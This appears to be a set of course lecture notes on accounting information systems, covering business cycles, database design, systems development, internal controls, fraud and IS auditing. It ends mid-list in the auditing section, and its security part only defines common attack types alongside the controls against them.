Chapter One

Accounting Information System

Data vs. Information

Data are facts stored in the system
A fact could be a number, date, name, and so on.
For example:
2/22/14
ABC Company, 123,
99, 3, 20, 60

Data vs. Information

If we put those facts within a context of a sales invoice, for example, it is meaningful and
considered information.
Invoice Date: 2/22/14 Invoice #: 123
Customer: ABC Company
Item # Qty Price
99 3 $20
Total Invoice Amount $60

 Information is valuable when the benefits exceed the costs of gathering, maintaining, and
storing the data.
Benefit (i.e., improved decision making)
Cost (i.e., time and resources used to get the information)

What Makes Information Useful?

There are seven general characteristics that make information useful:
1. Relevant: information needed to make a decision (e.g., the decision to extend customer
credit would need relevant information on customer balance from an A/R aging report)
2. Reliable: information free from bias
3. Complete: does not omit important aspects of events or activities
4. Timely: information needs to be provided in time to make the decision
5. Understandable: information must be presented in a meaningful manner
6. Verifiable: two independent people can produce the same conclusion
7. Accessible: available when needed

Transactional Information between Internal and External Parties in AIS

• Business organizations conduct business transactions between internal and external
stakeholders.
• Internal stakeholders are employees in the organization (e.g., employees and managers).
• External stakeholders are trading partners such as customers and vendors as well as other
external organizations such as Banks and Government.
 • The AIS captures the flow of information between these users for the various business
transactions.
• Thus, an accounting information system (or simply an accounting system) may be
defined as “the combination of personnel, records, and procedures that a business uses to
meet its need for financial data”.
The AIS performs three important functions in any organization:
• It collects and stores data about activities and transactions so that the organization can
review what has happened.
• It processes data into information that is useful for making decision that enable
management to plan, execute, and control activities.
• It provides adequate controls to safeguard the organization’s assets, including its data.
These controls ensure that the data is available when needed and that it is accurate and
reliable.

Most organizations engage in many similar and repetitive transactions. These transaction
types can be grouped into the five basic cycles, each of which constitutes a basic subsystem
in the AIS:
• The expenditure cycle consists of the activities involved in buying and paying for goods
or services used by the organization.
• The human resources/payroll cycle consists of the activities involved in hiring and paying
employees. (part of expenditure cycle)
• The revenue cycle consists of the activities involved in selling goods or services and
collecting payment for those sales.
• The financing cycle consisted of those activities involved in obtaining the necessary
funds to run the organization and in repaying creditors and distributing profits to
investors.
• The production cycle consists of the activities involved in converting raw materials and
labor into finished products. (Only manufacturing companies have a production cycle;
retail
Interactions between AIS and Internal and External Parties
Organizational Decisions and Information Needed
• Business organizations use business processes to get things done.
• Business processes are a set of structured activities that are performed by people, machines,
or both to achieve a specific goal.
• Key decisions and information needed often come from these business processes.

Basic Business Processes

• External transactions fundamentally involve a “give–get” exchange.
• These basic business processes are:
▫ Revenue: give goods / give service—get cash
▫ Expenditure: get goods / get service—give cash
▫ Production: give labor and give raw materials—get finished goods
▫ Payroll: give cash—get labor
▫ Financing: give cash—get cash
What Is an Accounting Information System?
• It can be manual or computerized
• Consists of
▫ People who use the system
▫ Processes
▫ Technology (data, software, and information technology)
▫ Controls to safeguard information
• AIS – is the combination of personnel, records, and procedures that transactional data is
collected, stored and processed into meaningful information from which business
 decisions are made and provides adequate controls to protect and secure the
organizational data assets.

A well thought out AIS can add value through effective and efficient decisions.
▫ Having effective decisions means quality decisions
▫ Having efficient decisions means reducing costs of decision making

AIS is influenced by an organization’s strategy.

• A strategy is the overall goal the organization hopes to achieve (e.g., increase
profitability).
• Once an overall goal is determined, an organization can determine actions needed to
reach their goal and identify the informational requirements necessary to measure how
well they are doing in obtaining that goal.

AIS in the Value Chain

• The value chain shows how the different activities within an organization provide value
to the customer.
• These activities are primary and support activities.
▫ Primary activities provide direct value to the customer.
▫ Support activities enable primary activities to be efficient and effective.

Data Processing Cycle

Steps in Processing Input are:
• Capture transaction data triggered by a business activity (event).
• Make sure captured data are accurate and complete.
• Ensure company policies are followed (e.g., approval of transaction).
Information collected for an activity includes:
• Activity of interest (e.g., sale)
• Resources affected (e.g., inventory and cash)
• People who participated (e.g., customer and employee)
Information comes from source documents.
• Captures data at the source when the transaction takes place
▫ Paper source documents
▫ Source data automation (captured data from machines, e.g., Point of Sale scanners
at grocery store)
• Important to understand how data is organized
▫ Chart of accounts
• Coding schemas that are well thought out to anticipate management needs
are most efficient and effective.
▫ Transaction journals (e.g., Sales)
▫ Subsidiary ledgers (e.g., Accounts receivable)
▫ General ledger
Note: With the above, one can trace the path of the transaction (audit trail).

Data is stored in master files or transaction files.

Data Processing
Four types of processing (CRUD):
• Creating new records (e.g., adding a customer)
• Reading existing data
• Updating previous record or data
• Deleting data
Data processing can be batch processed (e.g., post records at the end of the business day) or in
real-time (process as it occurs).

Information Output
The data stored in the database files can be viewed
• Online (soft copy)
• Printed out (hard copy)
▫ Document (e.g., sales invoice)
▫ Report (e.g., monthly sales report)
▫ Query (question for specific information in a database, e.g., What division had the
most sales for the month?)
Enterprise Resource Planning (ERP) Systems
• Integrates activities from the entire organization
▫ Production
▫ Payroll
▫ Sales
▫ Purchasing
▫ Financial Reporting
Advantages of ERP System
• Integrated enterprise-wide allowing for better flow of the information as it’s stored in a
centralized database and can be accessed by various departments which also improve
customer service.
• Data captured once (i.e., no longer need sales to enter data about a customer and then
accounting to enter same customer data for invoicing)
 • Improve access of control of the data through security settings
• Standardization of procedures and reports
Disadvantages of ERP System
• Costly
• Significant amount of time to implement
• Complex
• User resistance (learning new things is sometimes hard for employees)
Why Document Systems?
• Accountants must be able to read documentation and understand how a system works
(e.g., auditors need to assess risk)
• Sarbanes-Oxley Act (SOX) requires management to assess internal controls and auditors
to evaluate the assessment
• Used for systems development and changes
Data Flow Diagrams (DFD)
Focuses on the data flows for:
• Processes
• Sources and destinations of the data
• Data stores
DFD are visually simple, can be used to represent the same process at a high abstract or detailed
level.
Basic Data Flow Diagram Elements

Basic Guidelines for creating a DFD

• Understand the system that you are trying to represent.
• A DFD is a simple representation meaning that you need to consider what is relevant and
what needs to be included.
• Start with a high level (context diagram) to show how data flows between outside entities
and inside the system. Use additional DFD’s at the detailed level to show how data flows
within the system.
• Identify and group all the basic elements of the DFD.
• Name data elements with descriptive names, use action verbs for processes (e.g., update,
edit, prepare, validate, etc.).
• Give each process a sequential number to help the reader navigate from the abstract to the
detailed levels.
• Edit/Review/Refine your DFD to make it easy to read and understand.
Flowcharts
Describe an information system showing:
• Inputs and Outputs
• Information activities (processing data)
• Data storage
• Data flows
• Decision steps
Key strengths of flowcharts are that they can easily capture control via decision points, show
manual vs. automated processes.
Flowcharts Symbols
Types of Flowcharts
• Document: shows the flow of documents and data for a process, useful in evaluating
internal controls.
• System: depicts the data processing cycle for a process
• Program: illustrates the sequence of logic in the system process

Guidelines for Drawing Flowcharts

• Understand the system you are trying to represent.
• Identify business processes, documents, data flows, and data processing procedures.
• Organize the flowchart so as it reads from top to bottom and left to right.
• Name elements descriptively.
• Edit/Review/Refine to make it easy to read and understand.

Business Process Diagrams

• Is a visual way to represent the activities in a business process
• Intent is that all business users can easily understand the process from a standard notation
(BPMN: Business Process Modeling Notation)
 • Can show the organizational unit performing the activity
Business Process Diagram Basic Symbols

Payroll Business Process Diagram Example

 Chapter two
Database system
What is a database?
 Database
- it is a set of interrelated, centrally coordinated data files that are stored with as little data redundancy
as possible forms a database.

• A file is a related group of records.

A set of related records, such as all customer records, forms a file (e.g., the customer file).
• A record is a related group of fields
• A field is a specific attribute of interest for the entity (record)
All the fields containing data about one entity (e.g., one customer) form a record

Databases were developed to address the proliferation/increase of master files. For many years,
companies created new files and programs each time a need for information arose. Bank of
America once had 36 million customer accounts in 23 separate systems. This proliferation
created problems such as storing the same data in two or more master files.

 Database management system (DBMS)

- the program that manages and controls the data and the interfaces between the data and the
application programs that use the data stored in the database.

DBMS software links the way data are physically stored with each user’s logical view of the
data. The DBMS allows users to access, query, or update the database without reference to how
or where data are physically stored. Separating the logical and physical views of data also means
that users can change their logical view of data without changing the way data are physically
stored. Likewise, the DBA can change physical storage to improve system performance without
affecting users or application programs.

 Database system
- the database, the DBMS, and the application programs that access the database through the
DBMS.
 Database administrator
– the person responsible for coordinating, controlling, and managing the database.

 Data warehouse
In today’s fast-paced global economy, management must constantly reevaluate financial and
operating performance in light of strategic goals and quickly alter plans as needed. Since
strategic decision making requires access to large amounts of historical data, organizations are
building separate databases called data warehouses. A data warehouse is one or more very large
databases containing both detailed and summarized data for a number of years that is used for
analysis rather than transaction processing. It is not unusual for data warehouses to contain
hundreds or thousands of terabytes of data. Data warehouses do not replace transaction
processing databases; they complement them by providing support for strategic decision making.
Since data warehouses are not used for transaction processing, they are usually updated
periodically rather than in real time.

 Business intelligence
Analyzing large amounts of data for strategic decision making is often referred to as business
intelligence. There are two main techniques used in business intelligence: online analytical
processing (OLAP) and data mining. Online analytical processing (OLAP) is using queries to
investigate hypothesized relationships among data. For example, a manager may analyze
supplier purchases for the last 3 years, followed by additional queries that “drill down” to lower
levels by grouping purchases by item number and by fiscal period. Data mining is – analyzing
large amounts of data for strategic decision making.

 Online analytical processing (OLAP)

- using queries to investigate hypothesized relationships among data.

 Data mining
- using sophisticated statistical analysis to “discover” unhypothesized relationships in the data.

For future class note

Proper controls are needed to reap significant benefits from data warehousing. Data vali- dation
controls are needed to ensure that data warehouse input is accurate. Verifying the accu- racy,
called scrubbing the data, is often one of the most time-consuming and expensive steps in
creating a data warehouse. It is also important to control access to the data warehouse as well as
to encrypt the stored data. Finally, it is important to regularly backup the data ware- house and
store the backups securely. Bank of America created a customer information database to provide
customer service, marketing analysis, and managerial information. It was the largest in the
banking industry, with over 600 billion characters of data. It contained all bank data on checking
and savings accounts; real estate, consumer, and commercial loans; ATMs; and bankcards.
Although the bank spends $14 million a year to maintain the data warehouse, it is worth the cost.
Queries that formerly averaged 2 hours took only 5 minutes. Minutes after Los Angeles suffered
an earthquake, the bank sorted its $28 billion mortgage loan portfolio by Zip code, identified
loans in the earthquake area, and calculated its potential loan loss.
The advantages of Database systems
Virtually all mainframes and servers use database technology, and database use in personal
computers is growing rapidly. Most accountants are involved with databases through data en-
try, data processing, querying, or auditing. They also develop, manage, or evaluate the controls
needed to ensure database integrity.
Databases provide organizations with the following benefits:
● Data integration. Master files are combined into large “pools” of data that many application
programs access. An example is an employee database that consolidates payroll, personnel, and
job skills master files.
● Data sharing. Integrated data are more easily shared with authorized users. Databases are
easily browsed to research a problem or obtain detailed information underlying a report. The
FBI, which does a good job of collecting data but a poor job of sharing it, is spending 8 years and
$400 million to integrate data from their different systems.
● Minimal data redundancy and data inconsistencies. Because data items are usually stored
only once, data redundancy and data inconsistencies are minimized.
● Data independence. Because data and the programs that use them are independent of each
other, each can be changed without changing the other. This facilitates programming and
simplifies data management.
● Cross-functional analysis. In a database system, relationships, such as the association
between selling costs and promotional campaigns, can be explicitly defined and used in the
preparation of management reports.
Incorrect database data can lead to bad decisions, embarrassment, and angry users.

Database Users and Designers

• Different users of the database information are at an external level of the database. These users
have logical views of the data. The users have external or logical view (the way how to use).
The logical view is how people conceptually organize and understand the relationships among
data items.
For example, a sales manager views all customer information as being stored in a table.
The physical view refers to the way data are physically arranged and stored in the computer
system. DB designers have physical or internal view.

• Designers of a database need to understand user’s needs and the conceptual level of the entire
database as well as the physical view. The conceptual view illustrates the different files and
relationships between the files.

• The data dictionary is a “blueprint” of the structure of the database and includes data elements,
field types, programs that use the data element, outputs, and so on.

DBMS Languages

• Data Definition Language (DDL)

▫ Builds the data dictionary
▫ Creates the database
▫ Describes logical views for each user
• Data Manipulation Language (DML)
▫ Changes the content in the database
Creates, updates, insertions, and deletions
• Data Query Language (DQL)
▫ Enables users to retrieve/recover, order, sort and display specific data from the database.

Relational Database
Relational database – a set of table related to one another. A data- base built using the relational
data model.
• Represents the conceptual and external schema as if that “data view” was truly stored in one
table.
• Although the conceptual view appears to the user that this information is in one big table, it is
really a set of tables that relate to one another.

Why Have a Set of Related Tables?

• Data stored in one large table can be redundant and inefficient causing the following problems:
▫ Update anomaly
▫ Insert anomaly
▫ Delete anomaly

 Record layout
- Document that shows the items stored in a file, including the order and length of the data fields
and the type of data stored.

 Schema
- A description of the data elements in a database, the relationships among them, and the logical
model used to organize and describe the data.

 Conceptual-level schema
- the organization-wide view of the entire database that lists all data elements and the relation-
ships between them.

 External-level schema
- An individual user’s view of portions of a database; also called a subschema.

 Subschema
- A subset of the schema; the way the user defines the data and the data relationships.
 Internal-level schema
- A low-level view of the entire database describing how the data are actually stored and
accessed.

Data dictionary
- information about the structure of the database, including a description of each data element.

 Report writer
- DBMS language that simplifies report creation.

Relational data model

- a two-dimensional table representation of data; each row represents a unique entity (record) and
each column is a field where record attributes are stored.
 Tuple
- a row in a table that contains data about a specific item in a database table.
 Primary key
- database attribute, or combination of attributes, that uniquely identifies each row in a table.
 Foreign key
- an attribute in a table that is also a primary key in another table; used to link the two tables.

Two Approaches to Database Design

One way to design a relational database, called normalization, begins by assuming that
everything is initially stored in one large table. Rules are then followed to decompose that initial
table into a set of tables in what is called third normal form (3NF), because they are free of
update, insert, and delete anomalies.

In an alternative design approach, called semantic data modeling, the designer uses knowledge
of business processes and information needs to create a diagram that shows what to include in
the database. This diagram is used to create a set of relational tables that are al- ready in 3NF.

Relational Database Design Rules/ Basic Requirements

• Every column in a row must be single valued
• Primary key cannot be null (empty) also known as entity integrity
• IF a foreign key is not null, it must have a value that corresponds to the value of a primary key
in another table (referential integrity)
• All other attributes in the table must describe characteristics of the object identified by the
primary key

Following these rules allows databases to be normalized and solves the update, insert, and delete
anomalies.
Entity integrity rule - A non- null primary key ensures that every row in a table represents
something and that it can be identified.
Referential integrity rule - foreign keys which link rows in one table to rows in another table
must have values that correspond to the value of a primary key in another table
Queries
• Users may want specific information found in a relational database and not have to sort through
all the files to get that information. So they query (ask a question) the data.
• An example of a query might be: What are the invoices of customer D. Ainge and who was the
salesperson for those invoices?

Database Design Process

Conversion- replacing the old system with the new one. It can be one time or parallel.
Data model - an abstract representation of database contents.

Data Modeling
• Process of defining a database so that it faithfully represents all aspects of the
organization, including its interactions with the external environment.

▫ Entity-relationship (E-R) diagrams

▫ REA data model

REA Modeling

• Resources
▫ Things that have economic value to the organization (e.g., inventory, cash)
• Events
▫ Various business activities that management wants to collect information on (sale,
purchase…)
• Agents
▫ People and organizations that participate in events (both internal (e.g., employees) and
external (e.g., customers/vendors) to the organization)

Cardinality refers to the degree of relationship among events.

REA Basic Template

Creating an REA Model

• Identify relevant events
▫ Give-get exchange (economic duality)
• Identify resources and agents
▫ Resource reduced in give event
▫ Resource acquired in get event
• Determine cardinalities of relationships
▫ Nature of the relationship between the two entities
Database Systems and the Future of Accounting
Database systems have the potential to alter external reporting significantly. Considerable time
and effort are currently invested in defining how companies should summarize and re- port
accounting information to external users. In the future, companies may make a copy of the
company’s financial database available to external users in lieu of the traditional financial
statements. Users would be free to analyze the raw data however they see fit. A significant
advantage of database systems is the ability to create ad hoc queries to provide the information
needed for decision making. No longer is financial information available only in predefined
formats and at specified times. Instead, powerful and easy-to-use relational database query
languages can find and prepare the information management needs whenever they want it.
Relational DBMSs can also accommodate multiple views of the same underlying phenomenon.
For example, tables storing information about assets can include historical costs as well as
current replacement costs and market values. Thus, managers will no longer be forced to look at
data in ways predefined by accountants.
Finally, relational DBMSs are capable of integrating financial and operational data. For example,
customer satisfaction data can be stored in the database, giving managers a richer set of data for
decision making. Relational DBMSs have the potential to increase the use and value of
accounting information. Accountants must understand database systems so they can help design
and use the AISs of the future. Such participation is important for ensuring that adequate controls
are included in those systems to safeguard the data and ensure the reliability of the information
produced.
 Chapter 3

Systems Development and Systems Analysis

 Systems Development Life Cycle (SDLC)

Who is involved in SDLC?

• Information Systems Steering Committee
They are system hunter in the market
▫ Executive level, plans and oversees IS function; facilitates coordination with integration of
systems activities
• Project Development Team ▫ Plan and monitor project progress
Systems Analysts
▫ Determine information needs, prepare specifications for programmers
• Programmers
▫ Write and test programs according to analyst’s specifications
• Management
▫ Get users involved in the process; provide support for development projects, align projects to
meet organizations strategic needs
• Users
▫ Communicate needs to system developers, help design and test to ensure complete and accurate
processing of data

Systems Development Planning

• Proper planning provides for achieving goals and objectives

• For systems development, two plans are needed:
▫ Master Plan
Long-range and authored by steering committee outlining prioritized projects and timetables
▫ Project Development Plan
Specific to a project and authored by the project team identifies people, hardware, software,
and financial resources needed

Business Case (Feasibility Analysis)

• Economic
▫ Do benefits of new system justify the costs (time and resources) to implement?
• Technical
▫ Can we use existing technology?
• Legal
▫ Does new systems comply with regulations, laws, and contractual obligations?
• Scheduling
▫ Can the system be developed in the time allotted?
• Operational
▫ Do we have the people to design and implement the system? Will people use the new system?

Why People Resist Change?

• Fear
▫ Fear of failure, the unknown, losing status
• Lack of top-management support
▫ If the top management is not supportive why should the employee change?
• Bad prior experiences
▫ Bad experience with prior IS changes
• Poor communication
▫ Employees need to understand why change is necessary
• Disruption
▫ Additional requests for information and additional burden of time is distracting and prompts
negative feelings
• Manner change is introduced
▫ Approaches are different for top level and lower level employees
• Biases and emotions
• Personal characteristics and background
▫ Age
▫ Open to technology and comfortable with it
How to Prevent Behavioral Problems
• Management support
▫ Provide resources and motivation
• Satisfy user needs
• Involve users
▫ Participation improves communication and commitment
• Reduce fears, emphasize opportunities
• Avoid emotionalism
• Provide training
• Performance evaluation
▫ Reevaluate to ensure performance standards are consistent with the new system
• Keep open communications
• Test the system prior to implementation
• Keep system simple
▫ Avoid radical/direct changes
• Control user’s expectations
▫ Be realistic
We can reduce resistance but we cannot avoid it.

Phase 1: Systems Analysis

AIS Development Strategies
How to Obtain an AIS
• Purchase
• Develop in-house
• Outsource to outside organization
Advantage – helps to focus on your core competence
Disadvantage – may raise conflict of interest

Purchasing
• Select a vendor (from referrals, trade shows, etc.)
• Request for proposal (RFP) that meets needs
• Evaluate proposals
▫ Top vendors invited to give demonstrations on how their system will fit your needs
• Make a final selection based upon your criteria

Develop Software In-House

• Advantages
▫ Provides a significant competitive advantage
• Risks
▫ Requires significant amounts of time
▫ Complexity of the system
▫ Poor requirements defined
▫ Insufficient planning
▫ Inadequate communication and cooperation
▫ Lack of qualified staff
▫ Poor top management support

Outsourcing
Advantages
• Allows companies to concentrate on core competencies
• Asset utilization
• Access to greater expertise and better technology
• Lower costs by standardizing user applications and splitting development and maintenance
costs between projects
• Less development time
• Elimination of peaks-and valleys usage
• Facilitates downsizing
Disadvantage
• Inflexibility
• Loss of control
• Reduced competitive advantage
• Locked-in system
• Unfulfilled goals
• Poor service
• Increased risk
System Design Implementation and Operation
Phase 2: Conceptual Systems Design

Phase 3: Physical Systems Design

• Output design (e.g., reports)
• File and database design
• Input design (e.g., forms, computer screen input)
• Program design
• Procedures design
• Control design
Program Design
• Determine user needs
• Create and document development plan
• Write the computer code
• Test the program
• Document the program
• Train users
• Install the system (including components and hardware)
• Use and modify the system
Phase 4: Systems Implementation
• Implementation plan
• Select and train personnel
• Complete documentation
▫ Development documentation
▫ Operations documentation
▫ User documentation
• Testing the system
• Conversion

Testing the System

• Walk-throughs
▫ Step by step review
• Processing test data
▫ Test all valid transactions and error conditions
• Acceptance tests
▫ Use copies of real data

Conversion Approaches
• Direct conversion
▫ Terminates the old and begins with the new system
• Parallel conversion
▫ Operate old and new systems for a period of time
• Phase-in conversion
▫ Gradual replacement of old elements with new system elements
• Pilot conversion
▫ Implement a system in a part of an organization (e.g., a branch)

Phase 5: Operations and Maintenance

• Conduct post-implementation review
 Chapter 5
Control and Accounting Information Systems

What Is Control and why Needed?

• Any potential adverse occurrence or unwanted event that could be injurious to either the
accounting information system or the organization is referred to as a threat or risk.
• The potential dollar loss should a particular threat become a reality is referred to as the
exposure or impact of the threat.
• The probability that the threat will happen is the likelihood associated with the threat

A Primary Objective of AIS

• Is to control the organization so the organization can achieve its objectives
• Management expects accountants to:
o Take a proactive approach to eliminating system threats.
o Detect, correct, and recover from threats when they occur.

Internal Controls
• Processes implemented to provide assurance that the following objectives are achieved:
• Safeguard assets Maintain sufficient records
• Provide accurate and reliable information
• Prepare financial reports according to established criteria
• Promote and improve operational efficiency
• Encourage adherence with management policies
• Comply with laws and regulations

Functions of Internal Controls

• Preventive controls
▫ Deter problems from occurring
• Detective controls
▫ Discover problems that are not prevented
• Corrective controls
▫ Identify and correct problems; correct and recover from the problems

Control frame woks

Internal Environment
• Management’s philosophy, and risk appetite
Risk appetite is the attitude you have about risk.
• Commitment to integrity, ethical values, and competence
• Organizing structure
It is believed that centralized organizational structure has better control since it has high
supervision.
• Methods of assigning authority and responsibility
• Human resource standards
Placing the appropriate person on the appropriate position.
The better your competency the lower the error you make but it may have negative effect.

Objective Setting
• Strategic objectives
▫ High-level goals
• Operations objectives
▫ Effectiveness and efficiency of operations
• Reporting objectives
▫ Improve decision making and monitor performance
• Compliance objectives
▫ Compliance with applicable laws and regulations

Event Identification
Identifying incidents both external and internal to the organization that could affect the
achievement of the organizations objectives
Key Management Questions:
• What could go wrong?
• How can it go wrong?
• What is the potential harm?
• What can be done about it?

Risk Assessment
Risk is assessed from two perspectives:
• Likelihood - Probability that the event will occur
• Impact - Estimate potential loss if event occurs
Types of risk
• Inherent - Risk that exists before plans are made to control it
• Residual - Risk that is left over after you control it

Risk Response
• Reduce - Implement effective internal control
• Accept - Do nothing; accept likelihood and impact of risk
• Share - Buy insurance, outsource, or hedge
• Avoid - Do not engage in the activity. In reality it is not practical.

Control Activities
• Proper authorization of transactions and activities
• Segregation of duties
• Project development and acquisition controls
• Change management controls
• Design and use of documents and records
• Safeguarding assets, records, and data

Monitoring
• Perform internal control evaluations (e.g., internal audit)
• Implement effective supervision
• Use responsibility accounting systems (e.g., budgets)
• Monitor system activities
• Track purchased software and mobile devices
• Conduct periodic audits (e.g., external, internal, network security)
• Employ computer security officer
• Engage forensic specialists
• Install fraud detection software
• Implement fraud hotline
Forensic accounting identifies wrong doing in the organization related to accounting operation.

Threats to AIS
• Natural and Political disasters
• Software errors and equipment malfunctions
• Unintentional acts
• Intentional acts

Fraud
• Any means a person uses to gain an unfair advantage over another person; includes:
▫ A false statement, representation, or disclosure
▫ A material fact, which induces a victim to act
▫ An intent to deceive
▫ Victim relied on the misrepresentation
▫ Injury or loss was suffered by the victim

Two Categories of Fraud

• Misappropriation of assets
▫ Theft of company assets which can include physical assets (e.g., cash, inventory) and digital
assets (e.g., intellectual property such as protected trade secrets, customer data)
• Fraudulent financial reporting
▫ “cooking the books” (e.g. booking fictitious revenue, overstating assets, etc.)

Conditions for Fraud

These three conditions must be present for fraud to occur:
• Pressure
▫ Employee
 Financial
Lifestyle
Emotional
▫ Financial Statement
Financial
Management
Industry conditions
• Opportunity to:
▫ Commit
▫ Conceal
▫ Convert to personal gain
• Rationalize
▫ Justify behavior
▫ Attitude that rules don’t apply
▫ Lack personal integrity

Computer Fraud
• If a computer is used to commit fraud it is called computer fraud.
• Computer fraud is classified as:
▫ Input
▫ Processor
▫ Computer instruction
▫ Data
▫ Output

Preventing and Detecting Fraud

1. Make Fraud Less Likely to Occur

Organizational

 Create a culture of integrity

 Adopt structure that minimizes fraud,
 Create good governance (e.g., Board of
 Assign authority for business objectives and hold them accountable for achieving those
objectives,
 Effective supervision and monitoring of employees
 Communicate policies

Systems
▫ Develop security policies to guide and design specific control procedures
▫ Implement change management controls and project development acquisition controls

2. Make It Difficulty to Commit

Organizational
Develop strong internal controls
Segregate accounting functions
Use properly designed forms
Require independent checks and reconciliations of data

Systems
• Restrict access
• System authentication
• Implement computer controls over input, processing, storage and output of data
• Use encryption
• Fix software bugs and update systems regularly
• Destroy hard drives when disposing of computers

3. Improve Detection

Organizational
• Assess fraud risk
• External and internal audits

Systems
• Install fraud detection software
• Monitor system activities (user and error logs, intrusion detection)

4. Reduce Fraud Losses

Organizational
• Insurance
Systems
• Store backup copies of program and data files in secure, off-site location

Types of Attacks
Hacking
▫ Unauthorized access, modification, or use of an electronic device or some element of a
computer system
Social Engineering
▫ Techniques or tricks on people to gain physical or logical access to confidential information •
Malware
▫ Software used to do harm

Hacking
▫ Hijacking
 Gaining control of a computer to carry out illicit activities ▫ Botnet (robot network)
▫ Botnet (robot network)
Denial of Service (DoS) Attack
Spoofing- makes the communication look as if someone else sent it so as to gain confidential
information.

Forms of Spoofing
• E-mail spoofing
• Caller ID spoofing
• IP address spoofing
• SMS spoofing
• Web-page spoofing (phishing)

Hacking with Computer Code

Cross-site scripting (XSS)
▫ Uses vulnerability of Web application that allows the Web site to get injected with malicious
code. When a user visits the Web site, that malicious code is able to collect data from the user.

Other Types of Hacking

• Man in the middle (MITM)
▫ Hacker is placed in between a client (user) and a host (server) to read, modify, or steal data.
• Password cracking

Hacking Used for Embezzlement

• Salami technique:
▫ Taking small amounts at a time
Round-down fraud
• Economic espionage
▫ Theft of information, intellectual property and trade secrets
• Cyber-extortion
▫ Threats to a person or business online through e-mail or text messages unless money is paid

Hacking Used for Fraud

• Internet misinformation
• E-mail threats

Social Engineering Techniques

• Identity theft
▫ Assuming someone else’s identity
• Pretexting
▫ Using a scenario to trick victims to divulge
• Posing
▫ Creating a fake business to get sensitive information
• Phishing
▫ Sending an e-mail asking the victim to respond to a link that appears legitimate that requests
sensitive data
• Shoulder surfing
▫ Snooping (either close behind the person) or using technology to snoop and get confidential
information
• Skimming
▫ Double swiping credit card

Why People Fall Victim

• Compassion
▫ Desire to help others
• Greed
▫ Want a good deal or something for free
• Sex appeal
▫ More cooperative with those that are flirtatious or good looking
• Sloth
▫ Lazy habits
• Trust
▫ Will cooperate if trust is gained
• Urgency
▫ Cooperation occurs when there is a sense of immediate need

Minimize the Threat of Social Engineering

• Never let people follow you into restricted areas

• Never log in for someone else on a computer
• Never give sensitive information over the phone or through e-mail
• Never share passwords or user IDs
• Be cautious of someone you don’t know who is trying to gain access through you

Types of Malware
• Spyware
▫ Secretly monitors and collects information
• Key logger
▫ Software that records user key strokes
• Trap door
▫ Set of instructions that allow the user to bypass normal system controls
• Packet sniffer
▫ Captures data as it travels over the Internet
• Trojan Horse
▫ Malicious computer instructions in an authorized and properly functioning program
• Virus
▫ A section of self-replicating code that attaches to a program or file requiring a human to do
something so it can replicate itself
• Worm
▫ Stand alone self replicating program

Cellphone Bluetooth Vulnerabilities

• Bluesnarfing
▫ Stealing contact lists, data, pictures on bluetooth compatible smartphones
compatible smartphones
• Bluebugging
▫ Taking control of a phone to make or listen to calls, send or read text messages

Trust Services Framework

• Security
▫ Access to the system and data is controlled and restricted to legitimate users.
• Confidentiality
▫ Sensitive organizational data is protected.
• Privacy
▫ Personal information about trading partners, investors, and employees are protected.
• Processing integrity
▫ Data are processed accurately, completely, in a timely manner, and only with proper
authorization.
• Availability
▫ System and information are available.
Security Life Cycle
Security is a management issue
1. Assess threats and select risk response
2. Develop and communicate policies
3. Acquire and implement solutions
4. Monitor performance

Security Approaches
• Defense-in-depth
▫ Multiple layers of control (preventive and detective) to avoid a single point of failure
• Time-based model, security is effective if:
▫ P > D + C where
P is time it takes an attacker to break through preventive controls
D is time it takes to detect an attack is in progress
C is time it takes to respond to the attack and take corrective action

How to Mitigate Risk of Attack

Preventive Controls
• People
• Process
• IT Solutions
• Physical security
• Change controls and change management

Detective Controls
• Log analysis
• Intrusion detection systems
• Penetration testing
• Continuous monitoring

Corrective
• Computer Incident Response Team (CIRT)
• Chief Information Security Officer (CISO)

Preventive: People
• Culture of security
▫ Tone set at the top with management
• Training ▫ Follow safe computing practices
▫ Follow safe computing practices
Never open unsolicited e-mail attachments
Use only approved software
Do not share passwords
Physically protect laptops/cellphones
▫ Protect against social engineering

Preventive: Process
• Authentication—verifies the person
1. Something person knows
2.Something person has
3.Some biometric characteristic
4.Combination of all three
• Authorization—determines what a person can access

Preventive: IT Solutions
• Antimalware controls
• Network access controls
• Device and software hardening controls
• Encryption
Preventive: Other
• Physical security access controls
▫ Limit entry to building
▫ Restrict access to network and data
• Change controls and change management
▫ Formal processes in place regarding changes made to hardware, software, or processes

Auditing computer based information system

Auditing
• The process of obtaining and evaluating evidence regarding assertions about economic actions
and events in order to determine how well they correspond with established criteria

Major Steps in the Auditing Process

• Audit planning
▫ Why, how, when, and who
▫ Establish scope and objectives of the audit; identify risk
• Collection of audit evidence
• Evaluation of evidence
• Communication of results

Risk-Based Framework
• Identify fraud and errors (threats) that can occur that threaten each objective
• Identify control procedures (prevent, detect, correct the threats)
• Evaluate control procedures
▫ Review to see if control exists and is in place
▫ Test controls to see if they work as intended
• Determine effect of control weaknesses
▫ Compensating controls

Information Systems Audit

• Using the risk-based framework for an information systems audit allows the auditor to review
and evaluate internal controls that protect the system to meet each of the following objectives:
▫ Protect overall system security (includes computer equipment, programs, and data)
▫ Program development and acquisition occur under management authorization
▫ Program modifications occur under management authorization
▫ Accurate and complete processing of transactions, records, files, and reports
▫ Prevent, detect, or correct inaccurate or unauthorized source data
▫ Accurate, complete, and confidential data files

1. Protect Overall System Security

Threat
• Theft of hardware
• Damage of hardware (accidental and intentional)
• Loss, theft, unauthorized access to
▫ Programs
▫ Data
• Unauthorized modification or use of programs and data files
• Unauthorized disclosure of confidential data
• Interruption of crucial business activities

Controls
• Limit physical access to computer equipment
• Use authentication and authorization controls
• Data storage and transmission controls
• Virus protection and firewalls
• File backup and recovery procedures
• Disaster recovery plan
• Preventive maintenance
• Insurance

2. Program Development and Acquisition Occur under Management Authorization

Threat
• Accidental programming errors
• Unauthorized program code
Controls
• Review software license agreements
• Management authorization for:
▫ Program development
▫ Software acquisition
• Management and user approval of programming specifications
• Testing and user acceptance of new programs
• Systems documentation

5. Program Modification Occur under Management Authorization

Threat
• Accidental programming errors
• Unauthorized program code

Controls
• List program components to be modified
• Management authorization and approval for modifications
• User approval for modifications
• Test changes to program
• System documentation of changes
• Logical access controls
4. Accurate and Complete Processing of Transactions, Records, Files, and Reports

Threats
• Failure to detect incorrect, incomplete, or unauthorized input data
• Failure to correct errors identified from data editing procedures
• Errors in files or databases during updating
• Improper distribution of output
• Inaccuracies in reporting

Controls
• Data editing routines
• Reconciliation of batch totals
• Error correction procedures
• Understandable documentation
• Competent supervision

5. Prevent, Detect, or Correct Inaccurate or Unauthorized Source Data

Threat
